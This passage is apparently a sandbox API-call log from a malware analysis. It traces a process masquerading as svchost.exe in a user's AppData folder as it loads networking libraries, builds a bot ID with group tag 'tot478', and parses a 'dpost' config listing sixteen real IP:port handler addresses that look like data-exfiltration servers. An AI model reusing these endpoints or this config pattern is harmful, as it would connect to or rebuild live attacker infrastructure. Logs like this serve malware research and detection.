	os_tid = 0xcc0


Thread:
	id = 265
	os_tid = 0xcbc


Thread:
	id = 266
	os_tid = 0xd14


Thread:
	id = 267
	os_tid = 0xd28


Thread:
	id = 268
	os_tid = 0xd24


Process:
	id = "45"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17400"
	os_pid = "0xb28"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 285
	os_tid = 0xb38

	[0225.285] ResetEvent (hEvent=0x8) returned 1
	[0225.285] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.285] ResetEvent (hEvent=0x8) returned 1
	[0225.285] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.292] LoadLibraryW (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0225.295] ResetEvent (hEvent=0x8) returned 1
	[0225.295] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.297] GetProcAddress (hModule=0x75a90000, lpProcName=0x73) returned 0x75a93ab2
	[0225.297] ResetEvent (hEvent=0x8) returned 1
	[0225.297] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.300] LoadLibraryW (lpLibFileName="ACTIVEDS.dll") returned 0x6eb70000
	[0225.327] ResetEvent (hEvent=0x8) returned 1
	[0225.327] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.330] GetProcAddress (hModule=0x6eb70000, lpProcName=0x9) returned 0x6eb716e6
	[0225.330] ResetEvent (hEvent=0x8) returned 1
	[0225.330] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.332] LoadLibraryW (lpLibFileName="WININET.dll") returned 0x77230000
	[0225.388] ResetEvent (hEvent=0x8) returned 1
	[0225.388] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.391] GetProcAddress (hModule=0x77230000, lpProcName="HttpSendRequestW") returned 0x7725ba12
	[0225.391] ResetEvent (hEvent=0x8) returned 1
	[0225.391] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.394] GetProcAddress (hModule=0x77230000, lpProcName="InternetConnectW") returned 0x7725492c
	[0225.394] ResetEvent (hEvent=0x8) returned 1
	[0225.394] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.397] GetProcAddress (hModule=0x77230000, lpProcName="HttpOpenRequestW") returned 0x77254a42
	[0225.397] ResetEvent (hEvent=0x8) returned 1
	[0225.397] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.399] GetProcAddress (hModule=0x77230000, lpProcName="InternetReadFile") returned 0x7724b406
	[0225.400] ResetEvent (hEvent=0x8) returned 1
	[0225.400] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.402] GetProcAddress (hModule=0x77230000, lpProcName="InternetOpenW") returned 0x77259197
	[0225.402] ResetEvent (hEvent=0x8) returned 1
	[0225.402] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.405] GetProcAddress (hModule=0x77230000, lpProcName="InternetCloseHandle") returned 0x7724ab49
	[0225.405] ResetEvent (hEvent=0x8) returned 1
	[0225.405] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.408] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0225.408] ResetEvent (hEvent=0x8) returned 1
	[0225.408] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.410] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0225.410] ResetEvent (hEvent=0x8) returned 1
	[0225.410] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.413] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0225.413] ResetEvent (hEvent=0x8) returned 1
	[0225.413] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.415] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleOutputCP") returned 0x76bbe210
	[0225.415] ResetEvent (hEvent=0x8) returned 1
	[0225.415] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.418] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0225.418] ResetEvent (hEvent=0x8) returned 1
	[0225.418] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.421] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0225.421] ResetEvent (hEvent=0x8) returned 1
	[0225.421] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.423] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0225.424] ResetEvent (hEvent=0x8) returned 1
	[0225.424] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.490] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0225.490] ResetEvent (hEvent=0x8) returned 1
	[0225.490] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.493] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpyA") returned 0x76b59793
	[0225.493] ResetEvent (hEvent=0x8) returned 1
	[0225.493] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.496] GetProcAddress (hModule=0x76b10000, lpProcName="HeapCreate") returned 0x76b63ea2
	[0225.496] ResetEvent (hEvent=0x8) returned 1
	[0225.496] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.498] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0225.498] ResetEvent (hEvent=0x8) returned 1
	[0225.498] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.501] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0225.501] ResetEvent (hEvent=0x8) returned 1
	[0225.501] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.504] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.504] ResetEvent (hEvent=0x8) returned 1
	[0225.504] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.506] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0225.506] ResetEvent (hEvent=0x8) returned 1
	[0225.506] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.509] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0225.509] ResetEvent (hEvent=0x8) returned 1
	[0225.509] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.512] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpynW") returned 0x76b76118
	[0225.512] ResetEvent (hEvent=0x8) returned 1
	[0225.512] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.514] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0225.514] ResetEvent (hEvent=0x8) returned 1
	[0225.514] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.517] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0225.517] ResetEvent (hEvent=0x8) returned 1
	[0225.517] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.520] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0225.520] ResetEvent (hEvent=0x8) returned 1
	[0225.520] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.564] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenA") returned 0x76b5a611
	[0225.564] ResetEvent (hEvent=0x8) returned 1
	[0225.564] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.566] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0225.566] ResetEvent (hEvent=0x8) returned 1
	[0225.566] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.569] GetProcAddress (hModule=0x76b10000, lpProcName="ExitThread") returned 0x7735f611
	[0225.569] ResetEvent (hEvent=0x8) returned 1
	[0225.569] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.572] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0225.572] ResetEvent (hEvent=0x8) returned 1
	[0225.572] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.574] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0225.574] ResetEvent (hEvent=0x8) returned 1
	[0225.574] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.577] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0225.577] ResetEvent (hEvent=0x8) returned 1
	[0225.577] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.579] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryAndExitThread") returned 0x76b4fdb8
	[0225.579] ResetEvent (hEvent=0x8) returned 1
	[0225.580] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.582] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateThread") returned 0x76b622a7
	[0225.582] ResetEvent (hEvent=0x8) returned 1
	[0225.582] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.586] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0225.586] ResetEvent (hEvent=0x8) returned 1
	[0225.586] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.588] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfW") returned 0x76c2426d
	[0225.588] ResetEvent (hEvent=0x8) returned 1
	[0225.588] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.591] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0225.591] ResetEvent (hEvent=0x8) returned 1
	[0225.591] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.593] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeEx") returned 0x76d109ad
	[0225.593] ResetEvent (hEvent=0x8) returned 1
	[0225.593] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.596] GetProcAddress (hModule=0x76cd0000, lpProcName="IIDFromString") returned 0x76ce2ff2
	[0225.596] ResetEvent (hEvent=0x8) returned 1
	[0225.597] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.638] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0225.638] ResetEvent (hEvent=0x8) returned 1
	[0225.638] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.641] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76a60000
	[0225.641] ResetEvent (hEvent=0x8) returned 1
	[0225.641] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.643] GetProcAddress (hModule=0x76a60000, lpProcName=0x9) returned 0x76a63eae
	[0225.643] ResetEvent (hEvent=0x8) returned 1
	[0225.643] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.646] ResetEvent (hEvent=0x8) returned 1
	[0225.646] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0225.649] GetModuleHandleA (lpModuleName="msvcrt.dll") returned 0x76f80000
	[0225.649] GetProcAddress (hModule=0x76f80000, lpProcName="_wtoi") returned 0x76f8c823
	[0225.649] GetProcAddress (hModule=0x76f80000, lpProcName="_snwprintf_s") returned 0x76f9141b
	[0225.649] GetProcAddress (hModule=0x76f80000, lpProcName="_vsnwprintf_s") returned 0x76f913b4
	[0225.649] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x5b0000
	[0225.650] lstrcpyA (in: lpString1=0x10006028, lpString2="psfin32" | out: lpString1="psfin32") returned="psfin32"
	[0225.650] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fae0 | out: lpWSAData=0x19fae0) returned 0
	[0225.656] lstrlenA (lpString="tot478") returned 6
	[0225.656] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x130100, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0225.656] GetProcessHeap () returned 0x340000
	[0225.656] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xc) returned 0x354d78
	[0225.656] lstrlenA (lpString="tot478") returned 6
	[0225.656] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x130100, cbMultiByte=6, lpWideCharStr=0x354d78, cchWideChar=6 | out: lpWideCharStr="tot478n") returned 6
	[0225.656] GetProcessHeap () returned 0x340000
	[0225.656] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x354d78 | out: hHeap=0x340000) returned 1
	[0225.656] lstrlenA (lpString="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned 49
	[0225.656] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x130000, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49
	[0225.656] GetProcessHeap () returned 0x340000
	[0225.656] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x62) returned 0x35d6f0
	[0225.656] lstrlenA (lpString="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned 49
	[0225.657] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x130000, cbMultiByte=49, lpWideCharStr=0x35d6f0, cchWideChar=49 | out: lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611-93뽑㹳┸") returned 49
	[0225.657] GetProcessHeap () returned 0x340000
	[0225.657] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35d6f0 | out: hHeap=0x340000) returned 1
	[0225.657] SetConsoleOutputCP (wCodePageID=0xfde9) returned 0
	[0225.657] ResetEvent (hEvent=0x8) returned 1
	[0225.657] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0226.257] GetProcessHeap () returned 0x340000
	[0226.257] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x8) returned 0x35d6f0
	[0226.257] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=747, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 747
	[0226.257] GetProcessHeap () returned 0x340000
	[0226.258] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x5d8) returned 0x35d700
	[0226.258] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=747, lpWideCharStr=0x35d700, cchWideChar=748 | out: lpWideCharStr="<dpost>\r\n<handler>http://186.159.1.217:8082</handler>\r\n<handler>http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n") returned 747
	[0226.258] lstrlenW (lpString="handler>") returned 8
	[0226.258] lstrlenW (lpString="/handler>") returned 9
	[0226.258] lstrcpynW (in: lpString1=0x19f450, lpString2="http://186.159.1.217:8082</handler>\r\n<handler>http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://186.159.1.217:8082") returned="http://186.159.1.217:8082"
	[0226.258] GetProcessHeap () returned 0x340000
	[0226.258] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x35dce0
	[0226.258] lstrlenW (lpString="ttps://") returned 7
	[0226.258] lstrlenW (lpString="//") returned 2
	[0226.258] lstrlenW (lpString="") returned 0
	[0226.258] _wtoi (_String="8082") returned 8082
	[0226.258] lstrcpynW (in: lpString1=0x35dce4, lpString2="186.159.1.217:8082", iMaxLength=14 | out: lpString1="186.159.1.217") returned="186.159.1.217"
	[0226.258] lstrlenW (lpString="handler>") returned 8
	[0226.258] lstrlenW (lpString="/handler>") returned 9
	[0226.258] lstrcpynW (in: lpString1=0x19f450, lpString2="http://186.10.243.70:8082</handler>\r\n<handler>http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://186.10.243.70:8082") returned="http://186.10.243.70:8082"
	[0226.258] GetProcessHeap () returned 0x340000
	[0226.258] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x35e4f8
	[0226.258] lstrlenW (lpString="ttps://") returned 7
	[0226.258] lstrlenW (lpString="//") returned 2
	[0226.258] lstrlenW (lpString="") returned 0
	[0226.258] _wtoi (_String="8082") returned 8082
	[0226.258] lstrcpynW (in: lpString1=0x35e4fc, lpString2="186.10.243.70:8082", iMaxLength=14 | out: lpString1="186.10.243.70") returned="186.10.243.70"
	[0226.258] lstrlenW (lpString="handler>") returned 8
	[0226.258] lstrlenW (lpString="/handler>") returned 9
	[0226.258] lstrcpynW (in: lpString1=0x19f450, lpString2="http://75.183.130.158:8082</handler>\r\n<handler>http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://75.183.130.158:8082") returned="http://75.183.130.158:8082"
	[0226.258] GetProcessHeap () returned 0x340000
	[0226.258] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x35ed10
	[0226.258] lstrlenW (lpString="ttps://") returned 7
	[0226.258] lstrlenW (lpString="//") returned 2
	[0226.258] lstrlenW (lpString="") returned 0
	[0226.258] _wtoi (_String="8082") returned 8082
	[0226.258] lstrcpynW (in: lpString1=0x35ed14, lpString2="75.183.130.158:8082", iMaxLength=15 | out: lpString1="75.183.130.158") returned="75.183.130.158"
	[0226.259] lstrlenW (lpString="handler>") returned 8
	[0226.259] lstrlenW (lpString="/handler>") returned 9
	[0226.259] lstrcpynW (in: lpString1=0x19f450, lpString2="http://186.183.151.194:8082</handler>\r\n<handler>http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=28 | out: lpString1="http://186.183.151.194:8082") returned="http://186.183.151.194:8082"
	[0226.259] GetProcessHeap () returned 0x340000
	[0226.259] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x35f528
	[0226.259] lstrlenW (lpString="ttps://") returned 7
	[0226.259] lstrlenW (lpString="//") returned 2
	[0226.259] lstrlenW (lpString="") returned 0
	[0226.259] _wtoi (_String="8082") returned 8082
	[0226.259] lstrcpynW (in: lpString1=0x35f52c, lpString2="186.183.151.194:8082", iMaxLength=16 | out: lpString1="186.183.151.194") returned="186.183.151.194"
	[0226.259] lstrlenW (lpString="handler>") returned 8
	[0226.259] lstrlenW (lpString="/handler>") returned 9
	[0226.259] lstrcpynW (in: lpString1=0x19f450, lpString2="http://181.129.160.10:8082</handler>\r\n<handler>http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://181.129.160.10:8082") returned="http://181.129.160.10:8082"
	[0226.259] GetProcessHeap () returned 0x340000
	[0226.259] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x35fd40
	[0226.259] lstrlenW (lpString="ttps://") returned 7
	[0226.259] lstrlenW (lpString="//") returned 2
	[0226.259] lstrlenW (lpString="") returned 0
	[0226.259] _wtoi (_String="8082") returned 8082
	[0226.259] lstrcpynW (in: lpString1=0x35fd44, lpString2="181.129.160.10:8082", iMaxLength=15 | out: lpString1="181.129.160.10") returned="181.129.160.10"
	[0226.259] lstrlenW (lpString="handler>") returned 8
	[0226.259] lstrlenW (lpString="/handler>") returned 9
	[0226.259] lstrcpynW (in: lpString1=0x19f450, lpString2="http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://181.57.97.138:80") returned="http://181.57.97.138:80"
	[0226.259] GetProcessHeap () returned 0x340000
	[0226.259] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x360558
	[0226.259] lstrlenW (lpString="ttps://") returned 7
	[0226.259] lstrlenW (lpString="//") returned 2
	[0226.259] lstrlenW (lpString="") returned 0
	[0226.259] _wtoi (_String="80") returned 80
	[0226.259] lstrcpynW (in: lpString1=0x36055c, lpString2="181.57.97.138:80", iMaxLength=14 | out: lpString1="181.57.97.138") returned="181.57.97.138"
	[0226.259] lstrlenW (lpString="handler>") returned 8
	[0226.259] lstrlenW (lpString="/handler>") returned 9
	[0226.259] lstrcpynW (in: lpString1=0x19f450, lpString2="http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=23 | out: lpString1="http://200.21.51.30:80") returned="http://200.21.51.30:80"
